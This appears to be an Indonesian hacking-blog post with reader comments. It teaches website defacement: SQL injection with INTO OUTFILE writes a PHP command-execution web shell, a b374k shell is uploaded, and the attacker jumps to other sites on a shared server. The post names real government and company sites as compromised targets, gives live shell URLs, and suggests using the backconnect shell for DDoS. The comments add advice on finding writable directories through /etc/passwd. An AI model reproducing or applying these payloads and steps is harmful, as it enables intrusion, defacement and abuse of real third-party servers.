kali ini gw mau share beberapa teknik2(POC) buat ngedeface .
kalo yang sudah pada tau teknik2 ini jangan pada ngina
yah maklum nubie mau coba bikin artikel
yang sudah baca yah jangan lupa komen2nya
yah itung2 belajar bareng
ok mulai aja deh ke tutor
hal yg diperlukan :
nah kalo udah pada siap liangsung pergi ke om google untuk melakukan pencarian dengan dork :
kemudian pilih deh web target yang memiliki vulnerability
setelah masuk ke website targget ubah url nya yg tadinya load_file(‘/etc/passwd’ menjadi
“<?php echo \'<pre>\’;system($_GET[\’cmd\’]);echo \'</pre>\’;?>”
dan diakhir url ditambahkan
+INTO+OUTFILE+”lokasi direktory(folder) yang permisionya 777/namashell.php”/*
setelah berhasil membuat shell dari sql injection sebaiknya di coba terlebih dahulu apakah berhasil
atau tidak dengan menjalankan perintah ls -al pada cmd=
real target : http://www.inacif.gob.gt/design/default/james0bastershell.php?cmd=ls -al
upload deh shell yg lebih familiar buat anda digunakan seperti saya b374k.php dengan perintah
download sebagai berikut :
dan hasilnya sebagai berikut :
bisa backconnect sama bind, lumayan buat DDOS atau apalah soalnya servernya ga make firewall.
kalo belom bisa ngeroot bisa pake teknik jumping karena di dalemnya ada 21 readable user directory
berikut hasil URL jumpingan dari http://www.inacif.gob.gt/ ke http://www.cinde.com.gt/
URL : http://www.inacif.gob.gt/design/default/b374k.php?y=/home2/cinde/cinde-www/webcontrol/
dan berikut hasil defaceannya
dan masih banyak lagi
sehubung banyak yg minta script scaner buat tuh web lewat YM oke ane berikan nih
http://www.inacif.gob.gt/design/default/james0basterscaner.php
NB : JANGAN RUSAK WEBNYA KALO MAU DIFACE JANGAN INDEXNYA, DEFACE HIDEN AJA.
ITU BUAT BELAJAR BARENG2 JANGAN SERAKAH
You can follow any responses to this entry through the RSS 2.0 feed.
You can leave a response, or trackback from your own site.
..::james0baster::.. (15)
Berita dan Pengumuman (11)
Hacking (8)
Hacking (11)
ICT (4)
Internet (6)
Jaringan Komputer (7)
Java (1)
Keamanan (5)
Keamanan & Perbaikan WEB (9)
Komputer (8)
Local (3)
Pemerograman (8)
PHP (6)
Tips and Trick (6)
WP Cumulus Flash tag cloud by Roy Tanck and Luke Morton requires Flash Player 9 or better.
Mantap bang… thanks ea..
sama2 kk. mari belajar sama2
pusing gan
ctrl+d dulu aja deh gan 
Kk, maw nanya nih, itu mengenai directory yg ada permisi 777, gmn carinya ya? mohon penjelasannya. Thx
tebak2an aja kk
kan bisa liat list usernya yg ada di /etc/passwd
waduh,, pusing bacanya…
ga ngerti sm skli…
bs di ajarin lg ga kk?
bukannya dah jelas yah cara2nya
coba dulu aja kk
kalo ada kesulitan bisa ditanyakan di mari
gan progy2 yg perlu kita siapkan apa aja neh……
coz pengen praktekin neh….
ga pake program gan
modal browser aja, pake mozila atau google crom atau apa aja yg penting bisa ngakses port 80 atau website
jadi kl diwebnya ga ada folder yg 777 ga bisa donk kk…
bisa aja kk, yang penting permision groupnya writeable rwxrw-r– yang itu juga bisa
mantap……lgsung coba…mhon ijnnya….
ijin ngintip bro…
silakan
wih ini mantap bgt tutor’a… tpi syng ga ngrti2.. 😀 nyoba prhatiin ahh..
ga ngerti dimaananya gan
sip :* muah2 :*
manteb emang om james ini